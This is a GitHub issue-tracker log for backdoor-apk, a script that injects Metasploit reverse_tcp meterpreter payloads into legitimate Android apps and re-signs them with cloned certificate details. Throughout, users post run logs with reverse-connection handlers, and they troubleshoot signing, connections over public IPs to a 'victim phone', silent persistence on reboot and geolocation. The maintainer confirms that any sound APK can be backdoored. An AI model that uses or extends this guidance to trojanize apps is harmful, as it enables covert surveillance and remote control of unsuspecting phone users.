[2016-04-05 10:21] vay3t opened #3 "interesting"
interesting i have a similar project. https://github.com/vay3t/apkbinder
we could work together

[2016-04-11 18:19] dana-at-cp commented on #3
Nice. I'll keep an eye on your project as it progresses.

[2016-04-11 18:19] #3 closed

[2016-04-11 18:29] dana-at-cp opened #4 "The smali file to hook location logic fails with some manifest files"
The current logic used to locate the smali file to hook isn't robust enough to handle some manifest files. Essentially, the algorithm doesn't look back far enough to find the "activity" tag that is the parent of the "intent-filter" tag containing the "LAUNCHER" category child tag.

[2016-04-11 20:48] dana-at-cp commented on #4
Issue now resolved on master branch.

[2016-04-11 20:48] #4 closed

[2016-05-29 14:54] pentester opened #7 "Failed to recompile original project with backdoor"
Please help me....Thanks!

./backdoor-apk.sh browser.apk
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 192.168.1.7:8080
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done

[2016-06-02 19:03] dana-at-cp commented on #7
I'm sorry you are having trouble. It appears that you have to figure out why apktool is not happy on your system. Research the apktool exceptions that are in the log output.

[2016-06-02 19:03] #7 closed

[2016-06-19 12:05] Tirititelu opened #10 "Failed to singing recompiled APK"
The application fail to singing recompiled APK and the new backdoor APK doesn`t work... I can install it i my android.
This is the log:

[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: <MY IP>:4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Runni

[2016-06-20 14:36] dana-at-cp commented on #10
Hello. Is "jarsigner" in your path? I would guess that it's not. I'll make some minor changes to detect this state and destroy the recompiled, unsigned APK.

[2016-06-22 19:19] dana-at-cp commented on #10
New changes on master should make this a non-issue.

[2016-06-22 19:19] #10 closed

[2016-06-22 19:56] dana-at-cp opened #12 "The smali file to hook location logic fails when launcher line is within an activity-alias element"
The smali file to hook location logic fails when launcher line is within an "activity-alias" element. An example of such a manifest file is contained in Amazon_App.apk.

`<activity-alias android:enabled="true" android:exported="true" android:name="com.amazon.mShop.home.HomeActivity" android:targetActivity="com.amazon.mShop.splashscreen.StartupActivity">
            <intent-filter>

[2016-06-23 19:18] dana-at-cp commented on #12
Fix for this issue has been merged on to the master branch

[2016-06-23 19:18] #12 closed

[2016-06-23 20:18] Tirititelu opened #14 "Failed to sing recompiled apk: jarsigner error"
Hi,

i try again with your new version but dont gain the backdoor-apk.

[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: XX.XXX:XXX.XXX:4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfusc

[2016-06-24 16:03] dana-at-cp commented on #14
Is the original APK file signed? The script looks for "*.RSA" in the original archive and attempts to extract the dname value from the original cert.

[2016-06-24 18:03] Tirititelu commented on #14
Yes, i try with several APKs but the same error appear.... "jarsigner error: java.lang.RuntimeException: certificate exception: Empty issuer DN not allowed in X509Certificates".

[2016-06-25 04:42] dana-at-cp commented on #14
Did you modify the script in anyway? I checked the APK and confirmed that there is a certificate in the archive.

`
root@kali:/tmp# unzip -l Bwin-app-android.apk |grep ".RSA"
      942  2015-11-02 14:44   META-INF/CERT.RSA
root@kali:/tmp# unzip -p Bwin-app-android.apk META-INF/CERT.RSA |keytool -printcert
Owner: CN=Benjamin Ferrari, OU=NDC, O=bwin, L=Gibraltar, ST=Gibraltar, C=Gl
Issuer: CN=Benjam

[2016-06-25 07:51] Tirititelu commented on #14
I only changed IP and PORT to reverse_tcp connection, but i tried with no changes with the same result... :-(

[2016-06-27 13:49] dana-at-cp commented on #14
Try the latest version of the script off of the master branch. If it still fails then attach the full output of run.log and I'll have another look.

[2016-06-27 15:13] dana-at-cp commented on #14
I ran the latest version of the script on the APK you shared. It was processed fine. Check your environment. Make sure the APK is in the same working directory as the script at runtime.

[code]

[2016-06-27 15:13] #14 closed

[2016-06-27 18:17] Tirititelu commented on #14
I tried again and the same happend:

root@kaliSanna:~/backdoor-apk-master/backdoor-apk# ./backdoor-apk.sh Bwin-app-android.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projec

[2016-06-28 17:27] JoseluACT opened #17 "Failed recompiled original project"
Very good job!

Buy i have a problem, cant recompile the original project.

Run.log:

I: Using Apktool 2.1.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec

[2016-06-29 07:04] JoseluACT commented on #17
I have tried with severals apks. For example: http://marcacom.uptodown.com/android/descargar

Thanks!
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/338705/run.log.tar.gz)

[2016-06-29 07:08] Tirititelu commented on #14
No idea?.

Thx!

[2016-06-29 14:23] dana-at-cp commented on #17
Try to decompile and recompile the APK, outside of backdoor-apk, using Apktool alone. Let me know the results.

[2016-06-29 14:52] JoseluACT commented on #17
No problem to decompile:

I: Using Apktool 2.1.1 on marca-com-5-11-25.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I

[2016-06-29 16:19] dana-at-cp commented on #17
As I suspected, this is likely a problem with the original APK. Grab a known good APK from a reputable publisher and see if the "problems" go away. For example, I use AdobeReader.apk often in my testing.

[2016-06-29 18:31] JoseluACT commented on #17
The same problem with adobeReader.apk with both branches:

On Kali 2016:

root@kaliAsus:~/Descargas/backdoor-apk-moar-sneaky/backdoor-apk# ./backdoor-apk.sh com.adobe.reader_v16.2-148266_Android-4.0.3.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling or

[2016-06-29 18:44] dana-at-cp commented on #17
Hmm ... I am using Kali as well but not the Spanish version. :)

There is one other person reporting problems and I believe they are also using the Spanish version of Kali.

It's interesting that on Kali Sanna you get past the recompilation problem. On Kali Sanna you are failing precisely where the other Kali Sanna user is having trouble as well.

What is in the run.log file at the point of the si

[2016-06-29 19:04] dana-at-cp commented on #17
FYI.

This is where I think the signing code is failing on Kali Sanna:

'''
orig_rsa_cert=`$UNZIP -l $ORIG_APK_FILE |grep ".RSA" |awk ' { print $4 } '`
dname=`$UNZIP -p $ORIG_APK_FILE $orig_rsa_cert |$KEYTOOL -printcert |grep "Owner:" |sed 's/Owner: //g'`
echo "dname value: $dname" >>$LOG_FILE 2>&1
'''

I suspect that on the Spanish version the string "Owner" might not be in the output of the keyt

[2016-06-30 08:59] JoseluACT commented on #17
This is the problem! I need change "Owner" by "Propietario" in backdoor-apk.sh.

If i invoke keytool with Adobes's RSA:

"Propietario: CN=Adobe Systems Incorporated, OU=Adobe Reader, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US
Emisor: CN=Adobe Systems Incorporated, OU=Adobe Reader, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US
Número de serie: 4be060b7
Válido desd

[2016-06-30 15:13] Tirititelu commented on #17
Thank you! It's works!

[2016-06-30 15:52] dana-at-cp commented on #17
Awesome!

Gracias por sus informes de errores.

Thank you for your interest in the project as well.

[2016-06-30 15:52] #17 closed

[2016-07-03 18:06] ALBERT00 opened #19 "Failed to recompile original project with backdoor"
The issue i have, comes up when backdoor-apk recompiles the project with the backdoor.
Error: Failed to recompile original project with backdoor
I read the Issue #17 and try the solution, but it doesn't work.
Any ideas?

[2016-07-08 17:56] dana-at-cp commented on #19
Share the run.log output if you can.

[2016-07-15 13:32] #19 closed

[2016-07-23 00:55] userdsp opened #21 "Merging permissions of original and payload projects..."
[*] Merging permissions of original and payload projects...shuf: invalid input range: '9223372036854775807': Value too large for defined data type
shuf: invalid input range: '9223372036854775807': Value too large for defined data type
shuf: invalid input range: '9223372036854775807': Value too large for defined data type
shuf: invalid input range: '9223372036854775807': Value too large for defined

[2016-07-25 14:18] dana-at-cp commented on #21
Thanks for reporting this issue. I'll look into it.

[2016-07-25 18:24] dana-at-cp commented on #21
This is now fixed on the master branch. Version: 0.1.2

[2016-07-25 18:24] #21 closed

[2016-07-29 18:35] dana-at-cp opened #24 "The android/meterpreter/reverse_https payload silently fails in repackaged APK files"
The android/meterpreter/reverse_https payload breaks after proguard processing. The repackaged APKs run fine but the embedded meterpreter payload fails in the background.

[2016-07-29 21:44] dana-at-cp commented on #24
Fixed on the master branch. Version: 0.1.3

[2016-07-29 21:44] #24 closed

[2016-08-05 10:13] Qurexhi opened #26 "decompile failed"
failed to decompile RAT apt file

[2016-08-08 13:35] dana-at-cp commented on #26
Please share the run.log output.

[2016-08-10 01:13] cacaocaca commented on #26
The cleanup.sh all directory inside the script no exist more ..
./backdoor-apk.sh /root/Scrivania/com.piriform.ccleaner-v1.10.38-71411038-minAPI15.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.2.28:445
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[!] Failed to decompile orig

[2016-08-10 05:40] Qurexhi commented on #26
Running backdoor-apk at Wed Aug 10 01:34:02 EDT 2016
/usr/bin/msfvenom
/usr/bin/d2j-dex2jar
/usr/bin/unzip
/usr/bin/keytool
/usr/bin/jarsigner
third-party/apktool/apktool
third-party/proguard5.2.1/lib/proguard
third-party/android-sdk-linux/build-tools/23.0.3/dx
third-party/android-sdk-linux/build-tools/23.0.3/zipalign
Archive:  imo.apk
  Length      Date    Time    Name
---------  ---------- -----

[2016-08-12 21:38] dana-at-cp commented on #26
What is the original APK file? Is it from the Google Play Store?

[2016-08-12 22:00] cacaocaca commented on #26
No bro i think the people use apk of site direct as http://www.apkmirror.com/?s=ccleaner&post_type=app_release&searchtype=apk

[2016-08-15 15:54] dana-at-cp commented on #26
Unfortunately, if you are dealing with unofficial APKs then there are many reasons why apktool might not decompile correctly. Just about every reason would be the fault of the unofficial APK developer. This issue will be closed as it appears to be an issue with the original APK itself.

[2016-08-15 15:54] #26 closed

[2016-08-16 19:25] cacaocaca commented on #26
OK so ask how  extract the apk official of playstore  ?

[2016-08-16 19:32] dana-at-cp commented on #26
The easiest way would be via an app called AirDroid by Sand Studio. Check it out.

[2016-08-18 00:04] cacaocaca commented on #26
I have download apk official with airdroid but doesen t work same error first i though the problem was becouse the file apk was on my desktop so i pass it on folder backdoor-apk/backdoor-apk and he failed again
./backdoor-apk.sh RAR_5.40.build41.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.2.28:445
[*] Deco

[2016-08-18 16:22] dana-at-cp commented on #26
The resolution to issue #17 is the only workaround available. I don't have a better fix at this time for systems that are not using English as the default language.

Here's the comment from another user who encountered the same problem:

'This is the problem! I need change "Owner" by "Propietario" in backdoor-apk.sh.'

Make that small change to the script on your system and you should be good to g

[2016-08-18 17:33] devrajashwin commented on #19
sir can u tell me where to place the apk file original to make as rat,
1,i found this

root@venum:~/Downloads/backdoor-apk-master/backdoor-apk# ./backdoor-apk.sh
rm: cannot remove 'Rat.apk': No such file or directory
rm: cannot remove 'perms.tmp': No such file or directory
rm: cannot remove 'persistence.hook': No such file or directory
rm: cannot remove 'obfuscate.method': No such file or director

[2016-08-18 18:10] cacaocaca commented on #26
The backdoor-apk-sh is already root
root@kali:~/Scrivania/backdoor-apk/backdoor-apk# ls -al
totale 5056
drwxr-xr-x 5 root root    4096 ago 18 20:06 .
drwxr-xr-x 4 root root    4096 ago 10 03:01 ..
-rw-r--r-- 1 root root    5984 ago 10 03:01 android.pro
-rwxr-xr-x 1 root root   15350 ago 10 03:07 backdoor-apk.sh
-rwxr-xr-x 1 root root     215 ago 10 03:01 cleanup.sh
drwxr-xr-x 3 root root    4096 a

[2016-08-18 18:14] dana-at-cp commented on #26
Change the text "Owner" found in the backdoor-apk.sh script to the text "Propietario" is what needs to be done.

[2016-08-18 18:30] devrajashwin opened #28 "[!] Failed to decompile original APK file"
./backdoor-apk.sh /root/Downloads/backdoor-apk-master/backdoor-apk/tubemate_2.2.9.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: ''i used my ip''
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[!] Failed to decompile original APK file

[2016-08-18 18:50] dana-at-cp commented on #28
Copy the APK file into the same directory as the backdoor-apk.sh script.

[2016-08-18 18:50] #28 closed

[2016-08-18 19:22] devrajashwin commented on #28
see i have al ready  did that ..........
and then i runed
./backdoor-apk.sh  tubemate_2.2.9.apk

HERE IS THE SCREEN SHOT
![screenshot from 2016-08-19 00-51-42](https://cloud.githubusercontent.com/assets/20875171/17787538/127c0f64-6579-11e6-993d-c01371539710.png)

[2016-08-18 19:24] devrajashwin opened #29 "apk file is place in same folder and same problem i have attached with screen shots"
see i have al ready did that ..........
and then i runed
./backdoor-apk.sh tubemate_2.2.9.apk

![Uploading Screenshot from 2016-08-19 17-15-48.png…]()

2>TERMINAL
![screenshot from 2016-08-19 16-38-59](https://cloud.githubusercontent.com/assets/20875171/17808151/e9324404-65fd-11e6-832e-17f28d7c7d09.png)

[2016-08-19 11:15] devrajashwin commented on #29
its an orignal appliction
backuped my phone apk file

[2016-08-19 21:08] cacaocaca commented on #26
I have change same problem my kali are italian

[2016-08-20 03:38] dana-at-cp commented on #26
Looks like there is a typo above. If you simply copied the text then that could be the problem. It should be: "Proprietario"

Looks like I missed the 'r' character in my previous comment.

[2016-08-20 13:49] devrajashwin commented on #29
Are u gona reply me or not ,

[2016-08-22 01:44] cacaocaca commented on #29
Go on backdoor-apk.sh open it with edit of text getdit or other afther ctrl + f and text "Owner" he show two line of "Owner" replace it with "Proprietario" Save Rerun and work :)

[2016-08-22 01:44] cacaocaca commented on #26
Thanks man work now :)

[2016-08-22 14:45] devrajashwin commented on #29
i allready try it ,
but the result is same ,
if ur are saying so i will try i once more

[2016-08-22 15:51] devrajashwin commented on #29
i think some thing is missing in this code,
plz check this when i open this backdoor apk-sh with gedit its directly take me to this code,

echo -n "[*] Signing recompiled APK..."
$JARSIGNER -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore $keystore -storepass android -keypass android $compiled_apk signing.key >>$LOG_FILE 2>&1
rc=$?
echo "done."
if [ $rc != 0 ]; then
  echo "[!] Failed to sig

[2016-08-22 17:51] devrajashwin opened #30 "apktool errors on recompilation of original APK file"
i think the problem is apk signer
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.42.16:4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT AP

[2016-08-23 09:52] simonpunk commented on #29
hi, i ecountered the same issue as well, but when I look at the run.log, the line says:

rm: cannot remove 'signing.keystore': No such file or directory.

So I think that's the place keep raising the error.

[2016-08-23 10:39] devrajashwin commented on #29
yes plz post a new  isssue ,
so that they can help us

[2016-08-23 13:13] dana-at-cp commented on #30
Can you run the following from the command line on your Kali Linux instance?

# which jarsigner

Share the output.

[2016-08-23 13:16] dana-at-cp commented on #29
Run the following via the command line on your Kali Linux instance inside the git cloned directory for backdoor-apk:

shell> git remote show origin

Please share the output.

[2016-08-23 13:25] dana-at-cp commented on #29
So, I noticed this in the run.log file you shared above:

[code]

This is an error being thrown by apktool.

[2016-08-24 11:40] devrajashwin commented on #30
u meann log file
ok here its is
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/434584/run.log.tar.gz)

[2016-08-24 11:43] devrajashwin commented on #29
root@localhost:~/backdoor-apk/backdoor-apk# git remote show origin
* remote origin
  Fetch URL: https://github.com/dana-at-cp/backdoor-apk
  Push  URL: https://github.com/dana-at-cp/backdoor-apk
  HEAD branch: master
  Remote branch:
    master tracked
  Local branch configured for 'git pull':
    master merges with remote master
  Local ref configured for 'git push':
    master pushes to master (

[2016-08-24 15:48] dana-at-cp commented on #29
Try running the cleanup.sh script before running the backdoor-apk.sh script.

[2016-08-24 15:52] dana-at-cp commented on #30
So, this run.log file has the same error as the other open issue. Like I said in the other thread, this is an error being thrown by apktool:

[code]

[2016-08-24 15:53] dana-at-cp commented on #29
This seems to be a duplicate of another reported issue: #30

Closing as duplicate.

[2016-08-24 15:53] #29 closed

[2016-08-24 15:57] dana-at-cp commented on #30
Try running the cleanup.sh script before running the backdoor-apk.sh script.

[2016-08-24 15:59] dana-at-cp commented on #30
Also, did you modify the apktool program that the backdoor-apk.sh script uses?

[2016-08-25 16:49] devrajashwin commented on #30
no i did not changed any thing in the script

plz re patch it for me and thsnx

[2016-08-25 21:14] dana-at-cp commented on #30
As of right now, there is nothing to patch. The issue is isolated to apktool and the root cause remains unclear. Attach the the APK file when you have a chance.

[2016-08-26 19:11] devrajashwin commented on #30
how to do that plz bor help me

[2016-08-26 20:32] dana-at-cp commented on #30
You could try one of these methods:

http://receivetipstricks.com/extract-apk-android/

I have personally used Airdroid to pull APK files from Android devices and it works well.

[2016-08-27 15:54] devrajashwin commented on #30
yes is now is used Es file explorer to make an apk backup intsaled on my phone ,
but i got same error again ,
check out the sceen shot ans runlog
![screenshot from 2016-08-27 21-21-27](https://cloud.githubusercontent.com/assets/20875171/18028421/6ce7b808-6c6e-11e6-8008-548860405a9e.png)
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/440732/run.log.tar.gz)

[2016-08-29 20:26] dana-at-cp commented on #30
Attach one of the APK files that doesn't recompile for you.

[2016-08-30 17:11] devrajashwin commented on #30
ok here is the apk file
[Limbo_0.9.7.apk.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/445465/Limbo_0.9.7.apk.tar.gz)

[2016-09-01 19:32] dana-at-cp commented on #30
So, the APK file you provided was processed fine by the current version of backdoor-apk on my Kali Linux system:

[code]

[2016-09-02 08:14] devrajashwin commented on #30
but why its not working on my kali linux rolling
plz tell and help me

[2016-09-05 11:05] mehr66t opened #32 "rm: cannot remove ‘signing.keystore’: No such file or directory"
dear,
i have issue in recompile original project with backdoor
i always face failing in this part. even i signed one apk file and test again. but i failed as before.please help. Thank you in advance

[2016-09-07 19:09] dana-at-cp commented on #32
Please attach the run.log file after the failure.

[2016-09-09 06:17] mehr66t commented on #32
Dear,
FYI

[run.zip](https://github.com/dana-at-cp/backdoor-apk/files/463284/run.zip)

[2016-09-09 06:43] mehr66t commented on #32
my apk as well.
[badu.zip](https://github.com/dana-at-cp/backdoor-apk/files/463315/badu.zip)

[2016-09-12 16:47] dana-at-cp commented on #30
One thing to try ... make sure the "ia32-libs" are installed on your Kali Linux system:

[code]

[2016-09-12 17:08] dana-at-cp commented on #32
I see this in the run.log file:

[code]

This error, from apktool, is identical to the error being reported in another open issue. As of right now, the root cause is not known.

[2016-09-12 17:09] dana-at-cp commented on #32
This appears to be a duplicate of issue: #30

[2016-09-12 17:09] #32 closed

[2016-09-12 18:25] devrajashwin commented on #30
" i have installed  apt-get install lib32z1 lib32ncurses5 "
and tested it again but smae problem
i really dont know ehat to do now i fedup with this problem ........

root@localhost:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Limbo_0.9.7.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.43.4 :4444
[*] Decompi

[2016-09-12 18:38] dana-at-cp commented on #32
FYI. The APK file you provided does not recompile for me as well but I get a slightly different error in the logs. Did you provide the original APK? Is it a legit copy from the Google Play Store or did you obtain it from somewhere else on the Internet?

[2016-09-12 20:15] mehr66t commented on #32
i got it from internet. for apktool what should i do. thanks

On Mon, Sep 12, 2016 at 11:08 PM, Dana James Traversie <
notifications@github.com> wrote:

[2016-09-12 20:47] dana-at-cp commented on #32
I have a known good copy of Baidu Browser that you can use to test.

Here's the backdoor-apk.sh script output from a run that completed moments ago:

[code]

[2016-09-12 21:09] dana-at-cp commented on #30
Hmm ... that's really strange. Any chance you had a typo in your public IP entry?

[2016-09-13 05:01] devrajashwin commented on #30
sir when i use public ip in backdoor.py ,
its give me the error like this ,

i think the problem is apk signer
[] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.42.16:4444
[] Decompiling RAT APK file...done.
[] Decompiling original APK file...done.
[] Merging permissions of original and payload projects...done.
[] Ru

[2016-09-13 07:16] mehr66t commented on #32
dear can u share your apk. thanks

On Tue, Sep 13, 2016 at 1:17 AM, Dana James Traversie <
notifications@github.com> wrote:

[2016-09-13 16:22] dana-at-cp commented on #32
@mehr66t It's shared in my previous comment.

[2016-09-13 16:23] dana-at-cp commented on #30
@devrajashwin What is backdoor.py? That's not a script from this project.

[2016-09-14 14:20] devrajashwin commented on #30
sir ,
imean ,
when i edit file backdoor.py and i used my public ip in that  for  Handle the reverse connection
and then i try to recreate the orignal apk in to rat ,
its gives me an error,

[!] Failed to recompile original project with backdoor,

"that mean according to read me ,
we have to chage th ip in that backdoor.py file right  ,
iam talking about that"

[2016-09-15 06:28] mehr66t commented on #32
it worked! well done and thanks.

On Tue, Sep 13, 2016 at 8:52 PM, Dana James Traversie <
notifications@github.com> wrote:

[2016-09-15 17:59] dana-at-cp commented on #32
Beware of grabbing APK files from random places out on the Internet. They have mostly likely been tampered with in some fashion. Apktool generally fails to decompile/compile when an APK itself is in a bad state. If you stick with legitimate APK files from the Google Play store then you probably won't see Apktool failures.

[2016-09-16 18:17] dana-at-cp commented on #30
I imagine that some bad or extra characters are making there way into the file somehow when you edit. For instance, are you editing the file on Windows and then dropping it back in Kali Linux?

[2016-09-18 10:40] devrajashwin commented on #30
no sir ur are mistaken ,
iam kali riolling is dual booted ,
iam not editing the file in windows ,iam eiting it in kali rollin only,
"note: i am  not using any kind of vmware to start the kalli linux,......"

i suggest u to use
2nd thing is ur are using ur "ifconfig" ip to built it ,
insted of use the "whats my ip" /"Your public IP address"
then complie the apk see whats happens

[2016-09-19 18:27] dana-at-cp commented on #30
I'm going to make some changes to the script that will prompt for the IP address or hostname and port details. If you still experience the same problem after this new version is released then please open a new issue.

[2016-09-19 18:27] #30 closed

[2016-09-21 08:45] iSapron opened #34 "jarsigner error: java.lang.RuntimeException: certificate exception: Empty issuer DN not allowed in X509Certificates"
This bug appeared with the latest version of the script (15 hours ago). I don't know, what i have to do.
#14
//sorry for my bad English, i'm from Russia ;-)

[2016-09-21 08:56] iSapron commented on #34
Sorry, it's apk error, i just try with another apk and it's output this mistake:
I: Using Apktool 2.2.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
original/smali/mobi/wrt/android/smartcontacts/app/MainActivity.smali[1285,4] Invalid register: v22. Must be between v0 and v15, inclusive.
Exception in thread "main" brut.androlib.AndrolibException: Coul

[2016-09-21 09:04] iSapron commented on #34
i'm very sorry, it's again apk error, i took the apk baidu-browser and it has work!!! The last question: can i install the backdoor into a dialer's apk? Thanks in advance!

[2016-09-21 13:54] dana-at-cp commented on #34
Generally, Apktool only chokes on an APK when the APK itself has deficiencies or is otherwise malformed. You will see these types of issues with random APKs on the Internet but are less likely to have issues with legitimate APKs that are obtained via the Google Play Store.

To answer your question: Theoretically, you can backdoor any APK that doesn't have any issues identified by Apktool. :)

[2016-09-21 13:54] #34 closed

[2016-09-22 15:10] Mr-KIYFD opened #35 "Connecting via Public IP (meterpreter on WAN)"
I can backdoor apps and they work and connect back to the meterpreter flawlessly when I use my LAN IP.
The problem starts when I use my public IP, I do not get a meterpreter connection.

Additional Info :
1)The app still works as it should
2)I configured and tested portforwarding on my router  (e.g on my vitcim phone i can open a browser and point it to http://my.public.ip:2223 (which is the port

[2016-09-23 09:13] Qurexhi opened #36 "persistence"
brother when Application close meterpreter session close.
please make it persistence or any solution??

[2016-09-23 20:36] dana-at-cp commented on #35
I can't provide direct support for Metasploit or any of the other open source tools that are leveraged in the backdoor-apk project.

It sounds like the meterpreter session is unstable in this NAT'd environment.

Have you checked the Metasploit community for more information? There may be other folks who have seen this behavior.

https://community.rapid7.com/community/metasploit?linkid=blue

To ans

[2016-09-23 20:36] #35 closed

[2016-09-23 20:52] dana-at-cp commented on #36
Yes. Having the session die when the app is closed is expected behavior for now.

I do add a persistence hook that will silently try to reconnect the next time the phone reboots. Try it out. Let me know if it works for you.

[2016-09-25 06:01] SNDTiger commented on #36
still the same bro session closes after the application exit

[2016-09-25 15:11] anthonychaseparsons1 commented on #30
Ive had this exact issues before. Doing some research, I found that updating lib32 files, it worked flawlessly. Here are your commands.

sudo apt-get install lib32zl lib32ncurses5 lib32stdc++6

Also be sure to check your apktool version simply by typing apktool.

Here is all the steps I took to sucessfully configure backdoor-apk

apt-get update

Update apktool (Found on website)

sudo chmod +x

su

[2016-09-25 18:32] Qurexhi commented on #36
still not work brother session close when app close...

[2016-09-26 15:02] dana-at-cp commented on #30
@anthonychaseparsons1 Thanks for taking the time to share your experience and solution with other users. I truly appreciate it.

[2016-09-26 15:14] dana-at-cp commented on #36
@Qurexhi @SNDTiger I think you both missed what I said. It's normal to lose the session when the app closes. In order to persist backdoor access, there is code that will attempt to connect back when the Android device powers on (i.e. upon reboot). Make sure you have the metasploit handler running/listening when the device reboots. You should get a session with no visual indication on the device.

[2016-09-27 04:16] aancw commented on #36
Just for reference :) http://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

[2016-09-27 07:37] Maxnonym commented on #36
I have some issue, Failed to sign recompiled APK?
Thank you!!!

[2016-09-27 08:59] Maxnonym opened #38 "Failed to sign recompiled APK"
I have some issue, Failed to sign recompiled APK?
What could be the reason? Thank you

[2016-09-28 02:46] dana-at-cp commented on #36
@aancw The persistence hook featured in backdoor-apk uses a different method.

[2016-09-28 02:52] dana-at-cp commented on #38
Have a look at issue #17 and read through the comments.

[2016-09-28 02:53] dana-at-cp commented on #36
Closing since persistence upon device reboot is already a feature.

[2016-09-28 02:53] #36 closed

[2016-09-28 20:09] dana-at-cp commented on #38
@Maxnonym I'm going to close this issue. If you are still having problems then please open a new issue but be sure to include some useful information. For instance, your entire run.log file would be helpful.

[2016-09-28 20:09] #38 closed

[2016-09-29 12:11] hajerr51 commented on #17
Same problem...
Failed to recompile original project with bacdoor "kali linux" .

[2016-09-29 12:11] hajerr51 commented on #17
Backdoor**

[2016-09-30 04:47] Maxnonym commented on #38
Thank you!!

[2016-09-30 04:48] userdsp opened #39 "Failed to recompile original project."
Is it something with apktool ver?
[run.log.zip](https://github.com/dana-at-cp/backdoor-apk/files/502175/run.log.zip)

[2016-09-30 09:19] userdsp commented on #39
Its working at my VMware but not at my nethunter device. Can you add geolocation permission please?!

[2016-09-30 14:14] dana-at-cp commented on #39
@userdsp That's an issue with Apktool. Are you running the latest version? Is it installed/setup properly?

https://ibotpeaches.github.io/Apktool/install/

[2016-09-30 14:14] #39 closed

[2016-10-03 19:51] Emilien942702 opened #41 "The cert dname extraction logic fails on systems using Java keytool on a non-English language system"
Hi,
Facing issues with backdoor-apk, using Kali Linux 2.0 (lib32z1, lib32ncurses5 and lib32stdc++6 are installed and up to date, so as apktool), when it comes to Signing recompiled APK

[code]
Here is the intersting part of the log file
[code]

I can provide you logs & can try out what you want
Thanks a lot

[2016-10-03 22:15] Emilien942702 commented on #41
Just did `unzip -p myapk.apk META-INF/CERT.RSA |keytool -printcert` on the apk i wanted to use, and as i am running Kali in French it's "Propriétaire : " for "Owner".
Changed the script from this : `dname=`$UNZIP -p $ORIG_APK_FILE $orig_rsa_cert |$KEYTOOL -printcert |grep "Owner:" |sed 's/Owner: //g'``
to this : `dname=`$UNZIP -p $ORIG_APK_FILE $orig_rsa_cert |$KEYTOOL -printcert |grep "Propriétai

[2016-10-04 14:23] dana-at-cp commented on #41
@Emilien942702 Apologies. This is a known issue for systems using a native language other than English. This is a duplicate of issue #17 and I haven't spent time working on a better solution. I'll leave this issue open as a bug and will queue it up to be addressed.

[2016-10-04 20:18] neo241091 opened #42 "Commands in handler"
Are the commands after getting meterpreter session are limited in this code? Or it's the general issue in the handler. I am not able to run ls or pwd or any commands other than read , uid things like that

[2016-10-04 21:15] dana-at-cp commented on #42
@neo241091 There is no limitation on Android meterpreter but remember that you are getting access to the android system in the context of the backdoor'd application. Here's an example using Adobe Reader:

[code]

[2016-10-04 21:15] #42 closed

[2016-10-05 16:38] userdsp opened #43 "meterpreter > wlan_geolocate [-] wlan_geolocate: Operation failed: 1"
I can see permisions at perms.tmp
  <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
but ...
meterpreter > wlan_geolocate
[-] wlan_geolocate: Operation failed: 1
meterpreter > geolocate
[-] geolocate: Operation failed: 1
meterpreter >

Can you add GPS location permissions please, or if you are di

[2016-10-06 05:19] dana-at-cp commented on #41
@Emilien942702 Can you try running the script out of the "cert_dname_fix" branch? I made a small change on that branch that I think will solve the problem.

[2016-10-06 05:30] dana-at-cp commented on #43
@userdsp The backdoor-apk project merges all permissions from the Metasploit meterpreter payload with the permissions of the original APK. If some of the Android meterpreter commands are not working as expected you can check the Metasploit project for known bugs. You can also create a new issue if needed.

https://github.com/rapid7/metasploit-framework

